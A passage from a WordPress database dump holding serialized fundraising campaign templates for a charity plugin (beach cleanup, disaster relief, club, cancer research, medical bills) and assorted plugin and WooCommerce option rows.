\";s:12:\"facebook_url\";s:21:\"https://facebook.com/\";s:11:\"twitter_url\";s:20:\"https://twitter.com/\";s:5:\"align\";s:4:\"left\";}}}}}}i:1;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:1:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:2:{i:0;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:39:\"Keep the scene green by taking the lead\";s:7:\"content\";s:858:\"Your support will make a significant impact, enabling us to organize community clean-up events where volunteers, equipped with the necessary resources, can work together to remove garbage and restore the beach to its natural state. Additionally, your contributions will empower us to implement educational programs aimed at raising awareness about the importance of environmental conservation. We believe that through collective action, we can not only clean up our beloved beach but also inspire a lasting change in our community\'s attitudes towards environmental responsibility. Every donation, no matter how big or small, brings us one step closer to a cleaner, healthier environment for everyone. Join us in this vital endeavor, and let\'s create a positive ripple effect that benefits both our local ecosystem and the people who call this community home.\";}i:1;a:3:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-2.jpg\";s:5:\"align\";s:6:\"center\";}}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:423:\"<p>We are announcing a campaign dedicated to restoring the natural beauty of our local beach, which has sadly fallen victim to years of neglect and pollution. Our non-profit is on a mission to raise funds for cleaning supplies, vehicles, and essential costs to orchestrate a massive cleanup effort. By contributing, you\'re not just supporting a cleaner beach but also promoting environmental health and community pride.</p>\";}}}s:15:\"disaster-relief\";a:4:{s:4:\"meta\";a:16:{s:5:\"label\";s:15:\"Disaster Relief\";s:4:\"slug\";s:15:\"disaster-relief\";s:11:\"description\";s:41:\"Help those effected by natural disasters.\";s:13:\"template_type\";a:1:{i:0;s:6:\"single\";}s:11:\"search_tags\";a:4:{i:0;s:13:\"environmental\";i:1;s:7:\"medical\";i:2;s:6:\"family\";i:3;s:4:\"blue\";}s:10:\"categories\";a:3:{i:0;s:13:\"environmental\";i:1;s:7:\"medical\";i:2;s:6:\"family\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#9F190E\";s:9:\"secondary\";s:7:\"#202020\";s:8:\"tertiary\";s:7:\"#FFFFFF\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#9F190E\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;s:8:\"suffixes\";a:0:{}}s:6:\"layout\";a:2:{i:0;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:2:{i:0;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-1.jpg\";}s:12:\"progress-bar\";a:5:{s:9:\"show_hide\";a:2:{s:12:\"show_donated\";b:1;s:9:\"show_goal\";b:1;}s:9:\"css_class\";s:16:\"sample-css-class\";s:12:\"label_donate\";s:1:\" \";s:10:\"label_goal\";s:5:\"Goal \";s:13:\"meta_position\";s:3:\"top\";}}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:5:{i:0;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:12:\"Donate Today\";s:7:\"content\";s:85:\"This project will only be funded if at least $270,000 is raised by December 22, 2024.\";}i:1;a:1:{s:4:\"type\";s:16:\"campaign-summary\";}i:2;a:3:{s:4:\"type\";s:13:\"donate-button\";s:12:\"button_label\";s:10:\"Donate Now\";s:16:\"width_percentage\";i:100;}i:3;a:5:{s:4:\"type\";s:14:\"social-sharing\";s:8:\"headline\";s:5:\"Share\";s:12:\"facebook_url\";s:21:\"https://facebook.com/\";s:11:\"twitter_url\";s:20:\"https://twitter.com/\";s:5:\"align\";s:4:\"left\";}i:4;a:5:{s:4:\"type\";s:12:\"social-links\";s:8:\"headline\";s:9:\"Follow on\";s:12:\"facebook_url\";s:21:\"https://facebook.com/\";s:11:\"twitter_url\";s:20:\"https://twitter.com/\";s:5:\"align\";s:4:\"left\";}}}}}}i:1;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:1:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:2:{i:0;a:4:{s:4:\"type\";s:20:\"campaign-description\";s:8:\"headline\";s:19:\"About This Campaign\";s:7:\"content\";s:459:\"<p>We are announcing a new campaign aimed at providing crucial support to the victims of a recent devastating natural disaster. Together, we are rallying behind our fellow community members, raising funds through this non-profit initiative to help them rebuild homes, restore essential services, and reclaim their lives. Join us in making a difference, as every contribution brings us one step closer to bringing hope and stability back to those in need..</p>\";s:5:\"align\";s:4:\"left\";}i:1;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-2.jpg\";}}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:458:\"<p>We are announcing a new campaign aimed at providing crucial support to the victims of a recent devastating natural disaster. Together, we are rallying behind our fellow community members, raising funds through this non-profit initiative to help them rebuild homes, restore essential services, and reclaim their lives. Join us in making a difference, as every contribution brings us one step closer to bringing hope and stability back to those in need.</p>\";}}}s:17:\"club-organization\";a:4:{s:4:\"meta\";a:16:{s:5:\"label\";s:19:\"Club / Organization\";s:4:\"slug\";s:17:\"club-organization\";s:11:\"description\";s:63:\"Fund programs or help increase funds for a worthy organization.\";s:13:\"template_type\";a:1:{i:0;s:6:\"single\";}s:11:\"search_tags\";a:3:{i:0;s:18:\"club-organizations\";i:1;s:6:\"school\";i:2;s:4:\"blue\";}s:10:\"categories\";a:3:{i:0;s:18:\"club-organizations\";i:1;s:6:\"school\";i:2;s:6:\"sports\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#474735\";s:9:\"secondary\";s:7:\"#B1A17C\";s:8:\"tertiary\";s:7:\"#F4F0EE\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#B49A5F\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;s:8:\"suffixes\";a:0:{}}s:6:\"layout\";a:2:{i:0;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:1:{i:0;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-1.jpg\";}}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:4:{i:0;a:5:{s:4:\"type\";s:20:\"campaign-description\";s:8:\"headline\";s:15:\"About This Club\";s:7:\"content\";s:510:\"<p>We are announcing a campaign to support our cherished local country club, a haven for our community, especially our elderly residents. Our non-profit is passionately rallying for funds to ensure the maintenance of this vital space and to sustain the heartwarming annual events that bring together generations. By contributing, you\'re preserving a beloved institution that unites the young and the old, fostering a sense of belonging and community spirit. Join us in safeguarding this haven for all ages!</p>\";s:16:\"width_percentage\";i:75;s:5:\"align\";s:4:\"left\";}i:1;a:8:{s:4:\"type\";s:12:\"progress-bar\";s:9:\"show_hide\";a:2:{s:12:\"show_donated\";b:1;s:9:\"show_goal\";b:1;}s:9:\"css_class\";s:16:\"sample-css-class\";s:12:\"label_donate\";s:1:\" \";s:10:\"label_goal\";s:10:\"Goal USD: \";s:13:\"meta_position\";s:3:\"top\";s:16:\"width_percentage\";i:75;s:5:\"align\";s:4:\"left\";}i:2;a:3:{s:4:\"type\";s:16:\"campaign-summary\";s:16:\"width_percentage\";i:75;s:5:\"align\";s:4:\"left\";}i:3;a:4:{s:4:\"type\";s:13:\"donate-button\";s:12:\"button_label\";s:10:\"Donate Now\";s:16:\"width_percentage\";i:40;s:5:\"align\";s:4:\"left\";}}}}}}i:1;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:3:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:2:{i:0;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:56:\"With 100% of donations going towards grants and programs\";s:7:\"content\";s:331:\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliqui.Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\";}i:1;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-2.jpg\";}}}i:1;a:4:{s:5:\"title\";s:7:\"Updates\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"updates\";s:6:\"fields\";a:1:{i:0;a:3:{s:4:\"type\";s:12:\"updates-main\";s:8:\"headline\";s:16:\"Top Team Members\";s:7:\"columns\";i:6;}}}i:2;a:4:{s:5:\"title\";s:8:\"Comments\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:8:\"comments\";s:6:\"fields\";a:1:{i:0;a:3:{s:4:\"type\";s:13:\"comments-main\";s:8:\"headline\";s:16:\"Top Team Members\";s:7:\"columns\";i:6;}}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:510:\"<p>We are announcing a campaign to support our cherished local country club, a haven for our community, especially our elderly residents. Our non-profit is passionately rallying for funds to ensure the maintenance of this vital space and to sustain the heartwarming annual events that bring together generations. By contributing, you\'re preserving a beloved institution that unites the young and the old, fostering a sense of belonging and community spirit. Join us in safeguarding this haven for all ages!</p>\";}}}s:14:\"medical-causes\";a:4:{s:4:\"meta\";a:16:{s:5:\"label\";s:14:\"Medical Causes\";s:4:\"slug\";s:14:\"medical-causes\";s:11:\"description\";s:58:\"Have a goal for more research, better treatment or a cure.\";s:13:\"template_type\";a:1:{i:0;s:6:\"single\";}s:11:\"search_tags\";a:3:{i:0;s:7:\"medical\";i:1;s:6:\"family\";i:2;s:4:\"blue\";}s:10:\"categories\";a:2:{i:0;s:7:\"medical\";i:1;s:6:\"family\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#192E45\";s:9:\"secondary\";s:7:\"#215DB7\";s:8:\"tertiary\";s:7:\"#48A9F5\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#48A9F5\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;s:8:\"suffixes\";a:0:{}}s:6:\"layout\";a:2:{i:0;a:2:{s:4:\"type\";s:3:\"row\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:1:{i:0;a:3:{s:4:\"type\";s:5:\"video\";s:8:\"headline\";s:0:\"\";s:14:\"upgrade-img-bg\";s:27:\"field-charitable-videos.jpg\";}}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:5:{i:0;a:1:{s:4:\"type\";s:14:\"campaign-title\";}i:1;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:23:\"Cancer Research Program\";s:7:\"content\";s:133:\"By donating to this cause, you can improve the lives of a variety of different people in your community and feel good about doing it.\";}i:2;a:6:{s:4:\"type\";s:12:\"progress-bar\";s:9:\"show_hide\";a:2:{s:12:\"show_donated\";b:1;s:9:\"show_goal\";b:1;}s:9:\"css_class\";s:16:\"sample-css-class\";s:12:\"label_donate\";s:1:\" \";s:10:\"label_goal\";s:10:\"Goal USD: \";s:13:\"meta_position\";s:3:\"top\";}i:3;a:1:{s:4:\"type\";s:16:\"campaign-summary\";}i:4;a:4:{s:4:\"type\";s:13:\"donate-button\";s:12:\"button_label\";s:10:\"Donate Now\";s:5:\"align\";s:4:\"left\";s:16:\"width_percentage\";i:50;}}}}}}i:1;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:40:\"no-padding no-field-target no-field-wrap\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:3:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:8:\"overview\";s:6:\"fields\";a:4:{i:0;a:5:{s:4:\"type\";s:20:\"campaign-description\";s:8:\"headline\";s:22:\"About Our Organization\";s:7:\"content\";s:618:\"<p>We are announcing a campaign dedicated to supporting our local hospital\'s crucial cancer research initiatives, focusing on children under 18, women, and minority communities. Our non-profit is passionately rallying for funds to maintain this specialized facility and sustain popular fundraisers accessible to our community. By contributing, you\'re directly investing in cutting-edge research, ensuring that young lives are given a fighting chance, and addressing healthcare disparities. Join us in this noble cause, as together, we strive to create a healthier future for our youth, women, and minority members.</p>\";s:16:\"width_percentage\";i:100;s:5:\"align\";s:4:\"left\";}i:1;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-1.jpg\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:64:\"Thinking differently is a proven strategy for changing the world\";s:7:\"content\";s:783:\"<p>Your support will not only fund vital research but also provide essential resources for specialized treatments, counseling, and support services tailored to the unique needs of young patients, women, and minorities battling cancer. By contributing to this campaign, you\'re helping us bridge the gaps in healthcare access, ensuring that everyone, regardless of age, gender, or ethnicity, receives the best possible care and support during their challenging journey.</p><p>Together, we can make a significant difference in the lives of those affected by cancer, offering them hope, strength, and the promise of a brighter, healthier tomorrow. Join us in our fight against cancer, and let\'s create a community where every individual receives the care and compassion they deserve.</p>\";}i:3;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-2.jpg\";}}}i:1;a:4:{s:5:\"title\";s:8:\"Comments\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:8:\"comments\";s:6:\"fields\";a:0:{}}i:2;a:4:{s:5:\"title\";s:7:\"Reviews\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"reviews\";s:6:\"fields\";a:0:{}}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:618:\"<p>We are announcing a campaign dedicated to supporting our local hospital\'s crucial cancer research initiatives, focusing on children under 18, women, and minority communities. Our non-profit is passionately rallying for funds to maintain this specialized facility and sustain popular fundraisers accessible to our community. By contributing, you\'re directly investing in cutting-edge research, ensuring that young lives are given a fighting chance, and addressing healthcare disparities. Join us in this noble cause, as together, we strive to create a healthier future for our youth, women, and minority members.</p>\";}}}s:13:\"medical-bills\";a:4:{s:4:\"meta\";a:15:{s:5:\"label\";s:13:\"Medical Bills\";s:4:\"slug\";s:13:\"medical-bills\";s:11:\"description\";s:77:\"Raise funds to devote towards medical treatment of a friend or family member.\";s:13:\"template_type\";a:1:{i:0;s:6:\"single\";}s:11:\"search_tags\";a:3:{i:0;s:7:\"medical\";i:1;s:6:\"family\";i:2;s:4:\"blue\";}s:10:\"categories\";a:2:{i:0;s:7:\"medical\";i:1;s:6:\"family\";}s:7:\"created\";s:10:\"2023-10-05\";s:7:\"version\";s:3:\"1.0\";s:6:\"author\";s:12:\"David Bisset\";s:12:\"dependencies\";b:0;s:10:\"has_access\";b:1;s:8:\"favorite\";b:0;s:6:\"colors\";a:5:{s:7:\"primary\";s:7:\"#5C8AF3\";s:9:\"secondary\";s:7:\"#21458F\";s:8:\"tertiary\";s:7:\"#F7F7F7\";s:6:\"accent\";b:0;s:9:\"button_bg\";s:7:\"#5C8AF3\";}s:12:\"parent_theme\";b:0;s:13:\"thumbnail_url\";b:0;}s:6:\"layout\";a:2:{i:0;a:2:{s:4:\"type\";s:6:\"header\";s:7:\"columns\";a:1:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:1:{i:0;a:2:{s:4:\"type\";s:14:\"campaign-title\";s:5:\"align\";s:6:\"center\";}}}}}}i:1;a:3:{s:4:\"type\";s:3:\"row\";s:9:\"css_class\";s:0:\"\";s:7:\"columns\";a:2:{i:0;a:1:{i:0;a:2:{s:4:\"type\";s:4:\"tabs\";s:4:\"tabs\";a:3:{i:0;a:4:{s:5:\"title\";s:8:\"Overview\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"default\";s:6:\"fields\";a:4:{i:0;a:5:{s:4:\"type\";s:20:\"campaign-description\";s:8:\"headline\";s:0:\"\";s:7:\"content\";s:404:\"<p>On June 12, 2023 Brook’s wife Maleena was admitted to hospital while 20 weeks pregnant, where she was diagnosed with Stage 4 B-cell Lymphoma. At just 22 years old, she has been confronted with a life-altering diagnosis and is now facing a grueling fight. After experiencing inflammation and pain in her legs in March, Brooke spoke with her GP and sought treatment from chiropractors and physios.</p>\";s:16:\"width_percentage\";i:100;s:5:\"align\";s:4:\"left\";}i:1;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-1.jpg\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:1:\" \";s:7:\"content\";s:940:\"Devastated by Maleena\'s diagnosis, Brooke found himself navigating a whirlwind of emotions and responsibilities. He became Maleena\'s unwavering pillar of support, attending every doctor\'s appointment and chemotherapy session with her, his heart aching at the sight of his young wife enduring such pain. The couple, once planning nursery decorations and baby names, now found themselves discussing treatment options and potential outcomes. Despite the overwhelming fear and uncertainty, they clung to each other, drawing strength from their love and the life growing inside Maleena. Friends and family rallied around them, offering words of encouragement and practical help, reminding them that they were not alone in this battle. In the face of adversity, Brooke and Maleena vowed to fight together, holding onto hope and cherishing every moment they had together, knowing that their love would be the guiding light in the darkest of times.\";}i:3;a:2:{s:4:\"type\";s:5:\"photo\";s:7:\"default\";s:11:\"photo-2.jpg\";}}}i:1;a:4:{s:5:\"title\";s:7:\"Updates\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:7:\"updates\";s:6:\"fields\";a:1:{i:0;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:1:\" \";s:7:\"content\";s:22:\"This is on second tab.\";}}}i:2;a:4:{s:5:\"title\";s:8:\"Comments\";s:4:\"type\";s:0:\"\";s:4:\"slug\";s:8:\"comments\";s:6:\"fields\";a:0:{}}}}}i:1;a:1:{i:0;a:2:{s:4:\"type\";s:6:\"fields\";s:6:\"fields\";a:5:{i:0;a:1:{s:4:\"type\";s:16:\"campaign-summary\";}i:1;a:6:{s:4:\"type\";s:12:\"progress-bar\";s:9:\"show_hide\";a:2:{s:12:\"show_donated\";b:1;s:9:\"show_goal\";b:1;}s:9:\"css_class\";s:16:\"sample-css-class\";s:12:\"label_donate\";s:1:\" \";s:10:\"label_goal\";s:10:\"Goal USD: \";s:13:\"meta_position\";s:3:\"top\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:8:\"headline\";s:1:\" \";s:7:\"content\";s:85:\"This project will only be funded if at least $270,000 is raised by December 22, 2020.\";}i:3;a:4:{s:4:\"type\";s:13:\"donate-button\";s:12:\"button_label\";s:10:\"Donate Now\";s:16:\"width_percentage\";i:75;s:5:\"align\";s:6:\"center\";}i:4;a:3:{s:4:\"type\";s:9:\"organizer\";s:13:\"role_or_title\";s:9:\"Organizer\";s:7:\"content\";s:0:\"\";}}}}}}}s:8:\"advanced\";a:2:{s:9:\"tab_style\";s:5:\"boxed\";s:8:\"tab_size\";s:6:\"medium\";}s:8:\"settings\";a:1:{s:7:\"general\";a:1:{s:11:\"description\";s:404:\"<p>On June 12, 2023 Brook’s wife Maleena was admitted to hospital while 20 weeks pregnant, where she was diagnosed with Stage 4 B-cell Lymphoma. At just 22 years old, she has been confronted with a life-altering diagnosis and is now facing a grueling fight. After experiencing inflammation and pain in her legs in March, Brooke spoke with her GP and sought treatment from chiropractors and physios.</p>\";}}}}}','yes'),(478830,'arm_updates_cron_db_initialize','1','yes'),(478831,'arm_updates_cron_db_activity_notice','0','yes'),(478832,'arm_updates_cron_db_total_activity_updated','0','yes'),(478833,'arm_updates_cron_db_notice','0','yes'),(478834,'arm_updates_cron_db_total_users_updated','0','yes'),(478835,'arm_lite_version_updated_date_4.0.32','2024-06-07 03:08:21','yes'),(488105,'woocommerce_hpos_fts_index_enabled','no','yes'),(489057,'arm_lite_version_updated_date_4.0.33','2024-06-20 02:09:57','yes'),(497731,'arm_lite_version_updated_date_4.0.34','2024-07-10 03:30:52','yes'),(502362,'woocommerce_attribute_lookup_optimized_updates','no','yes'),(507261,'arm_lite_version_updated_date_4.0.35','2024-07-21 05:32:09','auto'),(511628,'arm_lite_version_updated_date_4.0.36','2024-08-01 04:21:15','auto'),(519381,'arm_lite_version_updated_date_4.0.37','2024-08-08 03:36:37','auto'),(533929,'arm_lite_version_updated_date_4.0.38','2024-08-17 03:27:10','auto'),(534159,'wp_mail_smtp_summary_report_email_last_sent_week','19','auto'),(538029,'woocommerce_downloads_count_partial','yes','on'),(542511,'arm_lite_version_updated_date_4.0.39','2024-08-24 02:20:40','auto'),(555961,'arm_lite_version_updated_date_4.0.40','2024-09-01 02:15:59','auto'),(566553,'arm_lite_version_updated_date_4.0.41','2024-09-08 02:10:59','auto'),(573153,'woocommerce_email_footer_text_color','#3c3c3c','off'),(582591,'arm_lite_version_updated_date_4.0.42','2024-09-18 02:10:12','auto'),(594244,'arm_lite_version_updated_date_4.0.43','2024-09-25 02:20:08','auto'),(604537,'arm_lite_version_updated_date_4.0.44','2024-10-01 02:30:15','auto'),(619703,'arm_lite_version_updated_date_4.0.45','2024-10-09 02:19:38','auto'),(637295,'arm_lite_version_updated_date_4.0.46','2024-10-17 03:45:59','auto'),(650155,'arm_lite_version_updated_date_4.0.47','2024-10-25 02:21:04','auto'),(657815,'elementor_checklist','{\"last_opened_timestamp\":-1,\"first_closed_checklist_in_editor\":false,\"is_popup_minimized\":false,\"editor_visit_count\":0,\"steps\":[]}','auto'),(662455,'arm_lite_version_updated_date_4.0.48','2024-10-31 02:21:52','auto'),(673655,'_wpforms_transient_existing_tables','a:1:{s:12:\"wp_wpforms_%\";a:4:{i:0;s:15:\"wp_wpforms_logs\";i:1;s:23:\"wp_wpforms_payment_meta\";i:2;s:19:\"wp_wpforms_payments\";i:3;s:21:\"wp_wpforms_tasks_meta\";}}','off'),(675547,'arm_lite_version_updated_date_4.0.49','2024-11-09 02:22:15','auto'),(682613,'_transient_wp_styles_for_blocks','a:2:{s:4:\"hash\";s:32:\"8c7d46a72d7d4591fc1dd9485bedb304\";s:6:\"blocks\";a:5:{s:11:\"core/button\";s:0:\"\";s:14:\"core/site-logo\";s:0:\"\";s:18:\"core/post-template\";s:120:\":where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}\";s:12:\"core/columns\";s:102:\":where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}\";s:14:\"core/pullquote\";s:69:\":root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}\";}}','on'),(685028,'woocommerce_feature_site_visibility_badge_enabled','yes','on'),(685081,'arm_lite_version_updated_date_4.0.50','2024-11-14 03:21:09','auto'),(696981,'arm_lite_version_updated_date_4.0.51','2024-11-23 03:21:08','auto'),(712889,'arm_lite_version_updated_date_4.0.52','2024-12-01 03:21:03','auto'),(723348,'arm_lite_version_updated_date_4.0.53','2024-12-08 03:36:14','auto'),(738927,'woocommerce_feature_cost_of_goods_sold_enabled','no','on'),(738964,'arm_lite_version_updated_date_4.0.54','2024-12-18 03:39:43','auto'),(742238,'arm_lite_version_updated_date_4.0.55','2024-12-25 05:07:16','auto'),(743705,'charitable_usage_tracking_config','a:6:{s:3:\"day\";i:4;s:4:\"hour\";i:6;s:6:\"minute\";i:42;s:6:\"second\";i:10;s:6:\"offset\";i:369730;s:8:\"initsend\";i:1736404930;}','auto'),(743844,'arm_lite_version_updated_date_4.0.56','2025-01-01 03:31:15','auto'),(747781,'arm_lite_version_updated_date_4.0.57','2025-01-09 03:30:11','auto'),(755753,'wpforms_constant_contact_version','3','auto'),(755760,'wpforms_splash_version','1.8.6','auto'),(757857,'arm_lite_version_updated_date_4.0.58','2025-01-19 03:29:51','auto'),(758773,'widget_wc_brands_brand_description','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(758774,'widget_woocommerce_brand_nav','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(758775,'widget_wc_brands_brand_thumbnails','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(758778,'woocommerce_feature_rate_limit_checkout_enabled','no','on'),(758779,'woocommerce_feature_remote_logging_enabled','yes','on'),(758780,'woocommerce_feature_email_improvements_enabled','no','on'),(758844,'product_brand_children','a:0:{}','auto'),(758883,'woocommerce_admin_pes_incentive_woopayments_store_had_woopayments','no','auto'),(760225,'arm_lite_version_updated_date_4.0.59','2025-01-25 03:49:53','auto'),(790560,'elementor_landing_pages_activation','1','auto'),(790566,'_elementor_local_google_fonts','a:4:{s:6:\"roboto\";a:2:{s:3:\"url\";s:75:\"https://gopalak.in/wp-content/uploads/elementor/google-fonts/css/roboto.css\";s:7:\"version\";i:1742244582;}s:10:\"robotoslab\";a:2:{s:3:\"url\";s:79:\"https://gopalak.in/wp-content/uploads/elementor/google-fonts/css/robotoslab.css\";s:7:\"version\";i:1742244589;}s:4:\"itim\";a:2:{s:3:\"url\";s:73:\"https://gopalak.in/wp-content/uploads/elementor/google-fonts/css/itim.css\";s:7:\"version\";i:1742244590;}s:15:\"sairastencilone\";a:2:{s:3:\"url\";s:84:\"https://gopalak.in/wp-content/uploads/elementor/google-fonts/css/sairastencilone.css\";s:7:\"version\";i:1743354190;}}','auto'),(803769,'rzp_webhook_setup','yes','auto'),(803771,'woocommerce_feature_reactify-classic-payments-settings_enabled','yes','on'),(803783,'woocommerce_anonymize_refunded_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','off'),(803785,'woocommerce_email_auto_sync_with_theme','no','off'),(832551,'_wpforms_transient_upload_htaccess_file','a:3:{s:4:\"size\";i:737;s:5:\"mtime\";i:1745690386;s:5:\"ctime\";i:1745690386;}','on'),(857460,'_transient_wc_attribute_taxonomies','a:0:{}','on'),(857462,'woocommerce_attribute_lookup_enabled','yes','auto'),(859108,'_wp_session_expires_b07ee9651a4f1fb0b0dc6ba2b0254d58','1747466646','off'),(859152,'_wp_session_expires_1d46dcc97448e578c5167e6e6787815a','1747470015','off'),(859216,'_wp_session_expires_f5b1447b69585150cfdc4d3a8632e966','1747477584','off'),(859271,'_wp_session_expires_a201b9579089b0a8696f0b1eee314523','1747493595','off'),(859412,'_transient_doing_cron','1781553248.2032220363616943359375','on'),(860422,'wp_notes_notify','1','on'),(860427,'_transient_wp_core_block_css_files','a:2:{s:7:\"version\";s:5:\"6.9.1\";s:5:\"files\";a:584:{i:0;s:31:\"accordion-heading/style-rtl.css\";i:1;s:35:\"accordion-heading/style-rtl.min.css\";i:2;s:27:\"accordion-heading/style.css\";i:3;s:31:\"accordion-heading/style.min.css\";i:4;s:28:\"accordion-item/style-rtl.css\";i:5;s:32:\"accordion-item/style-rtl.min.css\";i:6;s:24:\"accordion-item/style.css\";i:7;s:28:\"accordion-item/style.min.css\";i:8;s:29:\"accordion-panel/style-rtl.css\";i:9;s:33:\"accordion-panel/style-rtl.min.css\";i:10;s:25:\"accordion-panel/style.css\";i:11;s:29:\"accordion-panel/style.min.css\";i:12;s:23:\"accordion/style-rtl.css\";i:13;s:27:\"accordion/style-rtl.min.css\";i:14;s:19:\"accordion/style.css\";i:15;s:23:\"accordion/style.min.css\";i:16;s:23:\"archives/editor-rtl.css\";i:17;s:27:\"archives/editor-rtl.min.css\";i:18;s:19:\"archives/editor.css\";i:19;s:23:\"archives/editor.min.css\";i:20;s:22:\"archives/style-rtl.css\";i:21;s:26:\"archives/style-rtl.min.css\";i:22;s:18:\"archives/style.css\";i:23;s:22:\"archives/style.min.css\";i:24;s:20:\"audio/editor-rtl.css\";i:25;s:24:\"audio/editor-rtl